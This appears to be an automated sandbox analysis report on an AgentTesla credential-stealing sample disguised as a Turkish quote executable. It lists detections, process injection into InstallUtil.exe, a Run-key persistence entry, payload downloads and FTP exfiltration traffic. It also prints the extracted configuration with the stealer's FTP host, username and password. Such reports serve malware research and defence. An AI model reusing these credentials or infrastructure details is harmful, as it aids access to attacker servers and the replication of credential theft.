Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Teklif-6205018797-6100052155-UUE.exe

Overview

General Information

Sample name:Teklif-6205018797-6100052155-UUE.exe
Analysis ID:1520406
MD5:a016634929c4d57cc24719723a4cd65c
SHA1:91e7492b6d3e543f185c69846bd175a626a931f5
SHA256:182b161a951229364aef6e16d358beb00f285c9f146053471ad22e714eefa719
Tags:exegeoTURuser-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Teklif-6205018797-6100052155-UUE.exe (PID: 3060 cmdline: "C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe" MD5: A016634929C4D57CC24719723A4CD65C)
    • InstallUtil.exe (PID: 6972 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Ptqlzgvzpfa.exe (PID: 1120 cmdline: "C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe" MD5: A016634929C4D57CC24719723A4CD65C)
    • InstallUtil.exe (PID: 6020 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Ptqlzgvzpfa.exe (PID: 2928 cmdline: "C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe" MD5: A016634929C4D57CC24719723A4CD65C)
    • InstallUtil.exe (PID: 5488 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.2532866894.0000000002B2A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2532866894.0000000002B2A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.2224473393.00000000035BF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.2224473393.00000000035BF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000000.00000002.2231136103.0000000005860000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              Click to see the 42 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.Teklif-6205018797-6100052155-UUE.exe.5860000.11.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.Teklif-6205018797-6100052155-UUE.exe.3e25f60.9.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                      • 0x31261:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                      • 0x312d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                      • 0x3135d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                      • 0x313ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                      • 0x31459:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                      • 0x314cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                      • 0x31561:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                      • 0x315f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                      Click to see the 10 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe, ProcessId: 3060, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ptqlzgvzpfa

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-27T10:43:39.090953+020020299271A Network Trojan was detected192.168.2.5497055.2.84.23621TCP
                      2024-09-27T10:44:02.252408+020020299271A Network Trojan was detected192.168.2.5520785.2.84.23621TCP
                      2024-09-27T10:44:10.402749+020020299271A Network Trojan was detected192.168.2.5520805.2.84.23621TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-27T10:43:23.015150+020020226401A Network Trojan was detected67.212.175.162443192.168.2.549704TCP
                      2024-09-27T10:43:46.488310+020020226401A Network Trojan was detected67.212.175.162443192.168.2.552073TCP
                      2024-09-27T10:43:54.928209+020020226401A Network Trojan was detected67.212.175.162443192.168.2.552077TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-27T10:43:23.015150+020020179621A Network Trojan was detected67.212.175.162443192.168.2.549704TCP
                      2024-09-27T10:43:46.488310+020020179621A Network Trojan was detected67.212.175.162443192.168.2.552073TCP
                      2024-09-27T10:43:54.928209+020020179621A Network Trojan was detected67.212.175.162443192.168.2.552077TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-27T10:43:39.726339+020028555421A Network Trojan was detected192.168.2.5497085.2.84.23655987TCP
                      2024-09-27T10:43:39.733257+020028555421A Network Trojan was detected192.168.2.5497085.2.84.23655987TCP
                      2024-09-27T10:44:02.871511+020028555421A Network Trojan was detected192.168.2.5520795.2.84.23660855TCP
                      2024-09-27T10:44:02.882716+020028555421A Network Trojan was detected192.168.2.5520795.2.84.23660855TCP
                      2024-09-27T10:44:11.022491+020028555421A Network Trojan was detected192.168.2.5520815.2.84.23652109TCP
                      2024-09-27T10:44:11.027817+020028555421A Network Trojan was detected192.168.2.5520815.2.84.23652109TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeReversingLabs: Detection: 50%
                      Multi AV Scanner detection for submitted file
                      Source: Teklif-6205018797-6100052155-UUE.exeReversingLabs: Detection: 50%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: Teklif-6205018797-6100052155-UUE.exeJoe Sandbox ML: detected
                      Source: Teklif-6205018797-6100052155-UUE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:52073 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:52077 version: TLS 1.2
                      Source: Teklif-6205018797-6100052155-UUE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000027FC000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003549000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2232534783.0000000005A10000.00000004.08000000.00040000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2477328871.0000000003FA7000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2446673623.00000000031B2000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2558909751.0000000003977000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.0000000002A78000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000027FC000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003549000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2232534783.0000000005A10000.00000004.08000000.00040000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2477328871.0000000003FA7000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2446673623.00000000031B2000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2558909751.0000000003977000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.0000000002A78000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_05960580
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 4x nop then jmp 0596257Ah0_2_05962540
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_05960578
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_05960697
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 4x nop then jmp 0596257Ah0_2_05962320
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 4x nop then jmp 0598564Ch0_2_059855D8
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 4x nop then jmp 0598564Ch0_2_059855E8
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 4x nop then jmp 059861A1h0_2_05986130
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 4x nop then jmp 059861A1h0_2_05986140
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 4x nop then jmp 0598C3D8h0_2_0598C319
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 4x nop then jmp 0598C3D8h0_2_0598C320
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_05A0D3E0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h4_2_06450578
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h4_2_06450530
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h4_2_06450580
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then jmp 0645257Ah4_2_06452303
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then jmp 0647C3D8h4_2_0647C319
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then jmp 0647C3D8h4_2_0647C320
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then jmp 064761A1h4_2_06476140
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then jmp 064761A1h4_2_06476130
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then jmp 0647564Ch4_2_064755D8
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then jmp 0647564Ch4_2_064755E8
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h4_2_064FD3E0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h5_2_05D30580
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then jmp 05D3257Ah5_2_05D32540
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h5_2_05D30578
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then mov eax, dword ptr [ebp-34h]5_2_05D30530
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then jmp 05D3257Ah5_2_05D32303
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then jmp 05D5564Ch5_2_05D555D8
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then jmp 05D5564Ch5_2_05D555E8
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then jmp 05D561A1h5_2_05D56140
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then jmp 05D561A1h5_2_05D56130
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then jmp 05D5C3D8h5_2_05D5C319
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then jmp 05D5C3D8h5_2_05D5C320
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h5_2_05DDD3E0

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49708 -> 5.2.84.236:55987
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:52079 -> 5.2.84.236:60855
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:52081 -> 5.2.84.236:52109
                      Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49705 -> 5.2.84.236:21
                      Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:52080 -> 5.2.84.236:21
                      Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:52078 -> 5.2.84.236:21
                      Source: Network trafficSuricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.5:49704
                      Source: Network trafficSuricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.5:49704
                      Source: Network trafficSuricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.5:52073
                      Source: Network trafficSuricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.5:52073
                      Source: Network trafficSuricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.5:52077
                      Source: Network trafficSuricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.5:52077
                      Connects to many ports of the same IP (likely port scanning)
                      Source: global trafficTCP traffic: 5.2.84.236 ports 1,60855,2,55987,21,52109
                      Source: global trafficTCP traffic: 192.168.2.5:49708 -> 5.2.84.236:55987
                      Source: global trafficHTTP traffic detected: GET /img/Tcghz.wav HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /img/Tcghz.wav HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /img/Tcghz.wav HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 67.212.175.162 67.212.175.162
                      Source: Joe Sandbox ViewIP Address: 5.2.84.236 5.2.84.236
                      Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
                      Source: Joe Sandbox ViewASN Name: ALASTYRTR ALASTYRTR
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownFTP traffic detected: 5.2.84.236:21 -> 192.168.2.5:49705 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:43. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:43. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:43. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:43. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /img/Tcghz.wav HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /img/Tcghz.wav HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /img/Tcghz.wav HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: wymascensores.com
                      Source: global trafficDNS traffic detected: DNS query: ftp.alternatifplastik.com
                      Source: global trafficDNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa
                      Source: InstallUtil.exe, 00000002.00000002.2448653484.000000000264C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2448653484.000000000263E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2532815910.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2532815910.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3319267989.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3319267989.0000000002C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.alternatifplastik.com
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2448653484.000000000263E000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2446673623.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2532815910.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3319267989.0000000002C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000035BF000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.000000000366C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2444038215.0000000000362000.00000040.00000400.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2477328871.000000000407C000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2446673623.0000000003264000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2558909751.0000000003A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2477328871.0000000004959000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2558909751.0000000004329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2446673623.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.0000000002918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
